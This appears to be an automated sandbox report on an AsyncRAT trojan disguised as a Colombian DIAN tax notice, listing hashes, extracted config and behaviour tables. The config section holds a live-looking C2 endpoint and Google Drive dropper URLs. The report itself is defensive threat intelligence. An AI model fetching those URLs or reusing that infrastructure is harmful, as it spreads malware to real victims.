asyncrat | 49bcb8e836ba3123aabf9bac83ad69146333cc4d34ca440e6a4f3b6436dee08f

Resubmissions

30-10-2024 14:31

241030-rvq7zawaln 10

30-10-2024 14:23

241030-rp9r5avhnl 10

Analysis

max time kernel
1798s
max time network
1800s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-10-2024 14:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DOCUMENTO_SISTEMA_REQUERIMIENTO_DIAN_PROCESO_DE_EMBARGO_REVISION_INMEDIATA_ad8098904901470147f818615.vbs
Size

68KB
MD5

722ef0f62d5f0d96f0f63888e0d8ae39
SHA1

0afc5ebc973e07bc01682922e5972dbfead09691
SHA256

b2bea3384dc24126675379eb1473946f2927a10d8eff6730bc024716ef0f6864
SHA512

9e614dbf3ea73992903a5a93884733ce4346e9108a78fba4f0ded8200cfd0fc33a929cebf2a1236163e63e6e33ac0b0daf8af8e881bb125f9cd57986db5454b2
SSDEEP

1536:bUJW4Wrle/PhG+/kery+bGNccc3gt5pzaUGwm:jS7rgt5pnGwm

Score

10^/10

asyncrat zzzzdefaultit defense_evasion discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

asyncrat

Version

| CRACKED BY https://t.me/xworm_v2

Botnet

zzzzDefaultIT

deadpoolstart2030.duckdns.org:6090

Mutex

CookieWin

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 64 IoCs

flow	pid	Process
4	5064	WScript.exe
6	5064	WScript.exe
23	4760	powershell.exe
29	4760	powershell.exe
131	4760	powershell.exe
182	3700	wscript.exe
183	3700	wscript.exe
187	3780	powershell.exe
190	3780	powershell.exe
211	3780	powershell.exe
250	1484	wscript.exe
251	1484	wscript.exe
260	3868	powershell.exe
261	3868	powershell.exe
304	3868	powershell.exe
404	4784	wscript.exe
406	4784	wscript.exe
407	2744	powershell.exe
408	2744	powershell.exe
416	2744	powershell.exe
434	5604	wscript.exe
436	5604	wscript.exe
438	5308	powershell.exe
440	5308	powershell.exe
459	4748	wscript.exe
460	4748	wscript.exe
466	5616	powershell.exe
467	5616	powershell.exe
477	2308	wscript.exe
479	2308	wscript.exe
485	5308	powershell.exe
489	452	powershell.exe
490	452	powershell.exe
493	5616	powershell.exe
498	452	powershell.exe
536	2980	wscript.exe
537	2980	wscript.exe
540	1944	powershell.exe
541	1944	powershell.exe
544	1944	powershell.exe
566	964	wscript.exe
567	964	wscript.exe
570	1480	powershell.exe
572	1480	powershell.exe
574	1480	powershell.exe
588	1600	wscript.exe
589	1600	wscript.exe
590	1736	powershell.exe
591	1736	powershell.exe
592	1736	powershell.exe
606	3332	wscript.exe
607	3332	wscript.exe
608	5580	powershell.exe
609	5580	powershell.exe
614	5580	powershell.exe
639	324	wscript.exe
640	324	wscript.exe
641	5068	powershell.exe
642	5068	powershell.exe
712	5068	powershell.exe
888	3480	wscript.exe
889	3480	wscript.exe
933	1832	powershell.exe
935	1832	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 59 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2652	powershell.exe
4368	powershell.exe
1432	powershell.exe
3608	powershell.exe
3868	powershell.exe
5616	powershell.exe
3216	powershell.exe
5544	powershell.exe
3700	powershell.exe
3824	powershell.exe
5280	powershell.exe
5808	powershell.exe
4436	powershell.exe
2744	powershell.exe
5152	powershell.exe
5580	powershell.exe
1832	powershell.exe
5888	powershell.exe
3780	powershell.exe
5004	powershell.exe
2792	powershell.exe
1944	powershell.exe
4888	powershell.exe
1736	powershell.exe
896	powershell.exe
5376	powershell.exe
5396	powershell.exe
4760	powershell.exe
3780	powershell.exe
3516	powershell.exe
5320	powershell.exe
3484	powershell.exe
6088	powershell.exe
6088	powershell.exe
6136	powershell.exe
2312	powershell.exe
5308	powershell.exe
4492	powershell.exe
5336	powershell.exe
1480	powershell.exe
5068	powershell.exe
1112	powershell.exe
5600	powershell.exe
4772	powershell.exe
6060	powershell.exe
5648	powershell.exe
5008	powershell.exe
452	powershell.exe
5188	powershell.exe
2384	powershell.exe
4104	powershell.exe
4452	powershell.exe
180	powershell.exe
4436	powershell.exe
2308	powershell.exe
5712	powershell.exe
5412	powershell.exe
2424	powershell.exe
1688	powershell.exe

Checks computer location settings 2 TTPs 23 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 31 IoCs

Web Service

T1102

flow	ioc
641	drive.google.com
569	drive.google.com
608	drive.google.com
978	drive.google.com
1151	drive.google.com
260	drive.google.com
407	drive.google.com
437	drive.google.com
1172	drive.google.com
570	drive.google.com
590	drive.google.com
1071	drive.google.com
1111	drive.google.com
22	drive.google.com
527	camo.githubusercontent.com
1194	drive.google.com
466	drive.google.com
1130	drive.google.com
930	drive.google.com
933	drive.google.com
1032	drive.google.com
1072	drive.google.com
438	drive.google.com
489	drive.google.com
1050	drive.google.com
1173	drive.google.com
23	drive.google.com
528	raw.githubusercontent.com
1092	drive.google.com
187	drive.google.com
540	drive.google.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 22 IoCs

description	pid	Process	procid_target
PID 4760 set thread context of 5968	4760	powershell.exe	128
PID 3780 set thread context of 5196	3780	powershell.exe	153
PID 3868 set thread context of 2392	3868	powershell.exe	182
PID 2744 set thread context of 5500	2744	powershell.exe	199
PID 5308 set thread context of 2248	5308	powershell.exe	214
PID 5616 set thread context of 3300	5616	powershell.exe	220
PID 452 set thread context of 2660	452	powershell.exe	221
PID 1944 set thread context of 6132	1944	powershell.exe	230
PID 1736 set thread context of 4584	1736	powershell.exe	242
PID 1480 set thread context of 5784	1480	powershell.exe	243
PID 5580 set thread context of 112	5580	powershell.exe	250
PID 5068 set thread context of 5440	5068	powershell.exe	268
PID 1832 set thread context of 2780	1832	powershell.exe	292
PID 6088 set thread context of 5124	6088	powershell.exe	308
PID 6088 set thread context of 896	6088	powershell.exe	614
PID 5280 set thread context of 5648	5280	powershell.exe	621
PID 1112 set thread context of 4564	1112	powershell.exe	633
PID 5808 set thread context of 1724	5808	powershell.exe	638
PID 5648 set thread context of 1012	5648	powershell.exe	645
PID 2312 set thread context of 3112	2312	powershell.exe	650
PID 3516 set thread context of 4236	3516	powershell.exe	655
PID 3608 set thread context of 440	3608	powershell.exe	665

Launches sc.exe 36 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5080	sc.exe
4108	sc.exe
2304	sc.exe
2352	sc.exe
5992	sc.exe
5860	sc.exe
832	sc.exe
4232	sc.exe
4620	sc.exe
4996	sc.exe
5916	sc.exe
6068	sc.exe
648	sc.exe
4576	sc.exe
4272	sc.exe
2796	sc.exe
1940	sc.exe
4496	sc.exe
2344	sc.exe
5652	sc.exe
3236	sc.exe
5572	sc.exe
1524	sc.exe
3100	sc.exe
1400	sc.exe
4460	sc.exe
5928	sc.exe
2424	sc.exe
3628	sc.exe
5024	sc.exe
4448	sc.exe
2948	sc.exe
832	sc.exe
2268	sc.exe
5948	sc.exe
5596	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4252	cmd.exe
5012	PING.EXE
5600	cmd.exe
4288	PING.EXE

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	Clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	Clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	Clipup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	clipup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	Clipup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	Clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	clipup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	clipup.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2252	timeout.exe
5240	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3442511616-637977696-3186306149-1000\{540825C2-2DF8-480E-9400-2D826E4BB82A}	msedge.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
4640	reg.exe
5748	reg.exe
1040	reg.exe
4540	reg.exe
5244	reg.exe
5008	reg.exe
2440	reg.exe
5976	reg.exe
5876	reg.exe
3264	reg.exe
2168	reg.exe
3896	reg.exe
5344	reg.exe
3048	reg.exe
1640	reg.exe
3484	reg.exe
4964	reg.exe
4732	reg.exe
4380	reg.exe
4568	reg.exe
4316	reg.exe
180	reg.exe
428	reg.exe
5124	reg.exe
3264	reg.exe
860	reg.exe
2272	reg.exe
5920	reg.exe
2300	reg.exe
1580	reg.exe
4084	reg.exe
3780	reg.exe
6124	reg.exe
5372	reg.exe
4108	reg.exe
6136	reg.exe
1196	reg.exe
5576	reg.exe
2272	reg.exe
652	reg.exe
1756	reg.exe
5712	reg.exe
3612	reg.exe
4056	reg.exe
4232	reg.exe
5024	reg.exe
2512	reg.exe
5740	reg.exe
3272	reg.exe
3024	reg.exe
112	reg.exe
4448	reg.exe
2268	reg.exe
4196	reg.exe
5628	reg.exe
4612	reg.exe
6020	reg.exe
4980	reg.exe
4632	reg.exe
2448	reg.exe
2528	reg.exe
4772	reg.exe
4672	reg.exe
5764	reg.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4288	PING.EXE
5012	PING.EXE

Script User-Agent 46 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	607	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1090	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1110	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	251	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	406	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	436	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	459	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	479	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	566	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1029	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1070	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1128	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1170	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	182	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	567	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	588	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	606	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1150	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1049	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1068	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	404	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	639	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	889	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	976	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	977	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1169	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	183	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	460	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	537	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	589	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1091	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1148	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1193	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1108	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1129	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	477	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	640	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1031	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1048	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1192	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	250	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	434	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	536	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	888	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4772	powershell.exe
4772	powershell.exe
4760	powershell.exe
4760	powershell.exe
4808	msedge.exe
4808	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4964	identity_helper.exe
4964	identity_helper.exe
4760	powershell.exe
4760	powershell.exe
5544	powershell.exe
5544	powershell.exe
5544	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
1092	msedge.exe
1092	msedge.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3868	powershell.exe
3868	powershell.exe
3868	powershell.exe
2172	msedge.exe
2172	msedge.exe
4436	powershell.exe
4436	powershell.exe
4436	powershell.exe
2744	powershell.exe
2744	powershell.exe
2744	powershell.exe
6060	powershell.exe
6060	powershell.exe
6060	powershell.exe
5308	powershell.exe
5308	powershell.exe
5308	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5616	powershell.exe
5616	powershell.exe
5616	powershell.exe
5336	powershell.exe
5336	powershell.exe
5336	powershell.exe
452	powershell.exe
452	powershell.exe
452	powershell.exe
4492	powershell.exe
4492	powershell.exe
1944	powershell.exe
1944	powershell.exe
1944	powershell.exe
1944	powershell.exe
4888	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2248	MSBuild.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	5968	MSBuild.exe
Token: SeDebugPrivilege	5544	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: 33	5840	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5840	AUDIODG.EXE
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	6060	powershell.exe
Token: SeDebugPrivilege	5308	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	5616	powershell.exe
Token: SeDebugPrivilege	5336	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeDebugPrivilege	2248	MSBuild.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	5152	powershell.exe
Token: SeDebugPrivilege	5580	powershell.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	3824	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: 33	4400	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4400	AUDIODG.EXE
Token: SeDebugPrivilege	896	powershell.exe
Token: SeDebugPrivilege	6088	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	5712	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	5412	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeIncreaseQuotaPrivilege	4620	WMIC.exe
Token: SeSecurityPrivilege	4620	WMIC.exe
Token: SeTakeOwnershipPrivilege	4620	WMIC.exe
Token: SeLoadDriverPrivilege	4620	WMIC.exe
Token: SeSystemProfilePrivilege	4620	WMIC.exe
Token: SeSystemtimePrivilege	4620	WMIC.exe
Token: SeProfSingleProcessPrivilege	4620	WMIC.exe
Token: SeIncBasePriorityPrivilege	4620	WMIC.exe
Token: SeCreatePagefilePrivilege	4620	WMIC.exe
Token: SeBackupPrivilege	4620	WMIC.exe
Token: SeRestorePrivilege	4620	WMIC.exe
Token: SeShutdownPrivilege	4620	WMIC.exe
Token: SeDebugPrivilege	4620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4620	WMIC.exe
Token: SeRemoteShutdownPrivilege	4620	WMIC.exe
Token: SeUndockPrivilege	4620	WMIC.exe
Token: SeManageVolumePrivilege	4620	WMIC.exe
Token: 33	4620	WMIC.exe
Token: 34	4620	WMIC.exe
Token: 35	4620	WMIC.exe
Token: 36	4620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4620	WMIC.exe
Token: SeSecurityPrivilege	4620	WMIC.exe
Token: SeTakeOwnershipPrivilege	4620	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
